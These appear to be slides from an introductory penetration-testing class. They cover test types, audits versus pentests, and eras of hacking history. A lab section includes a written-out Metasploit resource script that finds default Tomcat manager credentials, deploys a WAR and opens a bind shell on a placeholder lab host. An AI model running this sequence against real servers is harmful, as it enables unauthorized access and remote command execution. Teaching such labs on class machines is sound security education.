6. Definition #1
A vulnerability is a weakness that allows an attacker to reduce a
computer system's security.
8. Types of Security Testing
Network Testing $
Traditional; auditing of exposed services and their configuration
Web Application Testing $$
Focus on application-level flaws, including the web frameworks the
application is built on
Social Engineering $
Attacking users; most closely resembles real-world attacks
9. Types of Security Testing
Physical Testing / Red Teaming $$
A fork of social engineering, much more involved
Binary Analysis / Reverse Engineering / Exploit Development $$$
Specialty fields
Source Code Auditing $$
A fork of both web app testing and binary analysis
11. 3 Types of Tests
Confusing? A bit…
Audit
Usually network testing, based around some agency's expectation of
what security is. The biggest one is a standard called PCI (PCI DSS).
Usually boring, but brings in lots of money. Usually the same skill
sets are used.
Very structured; sometimes checklist- and vulnerability-scan-driven.
Can include IT services (firewall config review, VLAN review, etc.)
12. 3 Types of Tests
Assessment
Broader than an audit; doesn't have to comply with any agency's
expectation of security.
Mile wide, less in depth
Identify as many vulnerabilities as possible
Can include IT services (firewall config review, VLAN review, etc.)
13. 3 Types of Tests
Penetration Test
With all these definitions, the term tends to get confused.
"Pentests" actually test the security controls themselves and
exploit the vulnerabilities.
More goal-oriented: prove real threats; getting real data is the
success factor.
Harder; more expectation of pwnage; most of the time you have to
"get" something.
Usually does NOT include IT services.
We will focus mostly on pentesting… because I think it's the most
fun, but the skills map across all domains.
15. Lab 1: Trial by fire (metasploit)
Students who are here: access the class VM
• Run ./msfconsole
• Make sure you have updated msf
• Find the syntax to use the Tomcat Manager Deploy exploit module
• Google for default Tomcat passwords, or read the default-credential
lists that ship with Metasploit
• Use the generic bind TCP shell payload (generic/shell_bind_tcp)
• For students who are remote:
• Use g0tmi1k's guide:
• http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-tomcat.html
• Congratulations – You just pwned your 1st box! If you have extra time,
try to find the flags I've placed on the system and pwn a different lab
machine, or follow the video above to grab a legit SSH account.
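The lab steps above, written out as a Metasploit resource script so the whole sequence can be replayed with `msfconsole -r tomcat_lab.rc`. This is an added example, not part of the original slides or of g0tmi1k's guide. The target address 10.0.0.5 and manager port 8180 are placeholders for the class VM, the bind-shell port 4444 is arbitrary, and the option names (RHOSTS, HttpUsername/HttpPassword, STOP_ON_SUCCESS) follow current Metasploit; older versions named some of them differently (for example USERNAME/PASSWORD on the deploy module), so confirm them with `show options` exactly as the lab asks you to find the syntax yourself.

```text
# tomcat_lab.rc  (added example; placeholders and option names are assumptions,
# see the lead-in). Lines starting with # are comments in a resource script.

# Step 1: try Metasploit's built-in default Tomcat manager credentials.
# The scanner's default wordlists are data/wordlists/tomcat_mgr_default_users.txt
# and tomcat_mgr_default_pass.txt (open them if you want to see what it tries).
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 10.0.0.5
set RPORT 8180
set STOP_ON_SUCCESS true
run

# Step 2: deploy a WAR through the manager app with the credentials step 1 found.
# Replace tomcat/tomcat with whatever the scanner reported.
use exploit/multi/http/tomcat_mgr_deploy
set RHOSTS 10.0.0.5
set RPORT 8180
set HttpUsername tomcat
set HttpPassword tomcat

# The bind TCP payload the lab calls for: the target listens on LPORT and
# msfconsole connects to it, so nothing has to reach back to your VM.
set PAYLOAD generic/shell_bind_tcp
set LPORT 4444

# Print the resolved options before firing so a wrong host/port is caught here.
show options
exploit -z

# Step 3: the -z above leaves the session in the background; attach to it.
sessions -l
sessions -i 1
```

A bind shell is used because it matches the lab; on a real engagement you would normally prefer a reverse payload, since a listening port on the target is both more likely to be filtered and more visible to the defenders.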
16. A bit about hacking history…
4 Time Periods
Period 1 - In the not-so-distant past, hacking and attack vectors
were largely external.
Core external services were rife with overflows
Password complexity was non-existent
Trust-relationship vulnerabilities were numerous
Firewalls sucked or were non-existent
The big web vulns were just beginning to be exploited
17. A bit about hacking history…
Period 2 – Things got a bit better, then got worse
External services started to shape up; no more ./'ing the world
(running a stock exploit against every host you could reach).
Passwords got a bit better
Firewalls were big baddies
BUT…
Web vulns took off… SQL injection was EVERYWHERE, plus session
fixation, logic flaws, etc…
Internal software was Swiss cheese, so attackers migrated to
client-side vectors
18. A bit about hacking history…
Period 3 – Attackers got smart(er)
External services were pretty well hardened: the death of external
hacking and external security assessment.
With the death of externals, companies focused on internal pentests.
Web vulns were still prevalent but getting better with initiatives
like OWASP
Internal software was still bad, but OS mitigations put a band-aid
on some exploits.
Attackers created smarter ways to infect insiders through web
malware
19. A bit about hacking history…
Period 4 – The Current State
External services are very rarely vulnerable.
Web is still around, less in your face though.
Internal software continues to fail, but developing an exploit is 2-9
months of research for an 0-day. Much more work.
Focus on internal pentesting assumes the attacker got access somehow.
Internal pentesting is a lot of beating up on the Windows domain model,
popping unpatched boxes, abusing current password schemes, using
man-in-the-middle attacks, and internal password fail.
On the client side, attackers sometimes use no exploits at all: JavaScript
malware, Java applet reverse shells, crazy embedding tricks, etc… We are
just beginning to emulate this.
Mobile phones are making the mistakes of yesteryear; hot topic right
now
20. So What?
What you'll see a lot of still being sold in the industry:
Web Assessments
Internal Pentests
Source Code Review
Mobile Assessments
The new "External" pentests, which are really client-side penetration
test / social engineering assessment / web pentest hybrids